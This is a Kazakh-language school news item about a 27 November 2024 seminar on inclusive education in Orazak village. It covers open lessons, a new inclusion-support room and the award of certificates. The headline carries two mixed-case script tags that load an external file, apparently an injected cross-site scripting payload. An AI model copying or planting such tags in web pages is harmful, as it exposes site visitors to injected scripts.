Оразақ ауылының жалпы орта білім беретін мектебінде «Инклюзивтік білім беруді іске асыру ерекшеліктері» тақырыбында семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
28.11.2024
2024 жылдың 27 қарашасында Оразақ ауылының жалпы орта білім беретін мектебінде «Инклюзивтік білім беруді іске асыру ерекшеліктері» тақырыбында семинар өтті. Семинарға аудандық білім бөлімінің әдіскері Кабира Исламовна, аудан мектептерінен пән мұғалімдері, әлеуметтік мұғалім пен арнайы педагогтер қатысты. Семинардың мақсаты: инклюзивті білім беру бағытында тәжірибе алмасу, педагогтердің психологиялық-педагогикалық құзыретін арттыру. Семинар барысында жаңадан ашылған инклюзияны қолдау кабинетімен таныстырып, ерекше білім беруді қажет ететін оқушылармен ашық сабақтар өткізілді. Семинар соңында мұғалімдер өзара пікір алмасып, тренинг өткізіп, сертификаттар табысталды.
Просмотров: 1651